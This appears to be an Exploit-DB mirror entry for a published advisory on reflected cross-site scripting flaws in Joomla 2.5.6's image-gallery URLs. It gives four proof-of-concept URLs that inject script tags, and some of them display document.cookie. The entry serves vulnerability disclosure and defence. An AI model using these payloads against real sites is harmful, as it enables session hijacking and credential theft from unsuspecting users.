exploit-db-mirror/platforms/php/webapps/37473.txt
Offensive Security 369395e0c1 DB: 2015-07-04
8 new exploits
2015-07-04 05:01:45 +00:00

13 lines
933 B
Text
Executable file

source: http://www.securityfocus.com/bid/54259/info
Joomla! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! 2.5.6 is vulnerable; other versions may also be affected.
http://www.example.com/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
http://www.example.com/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala
http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>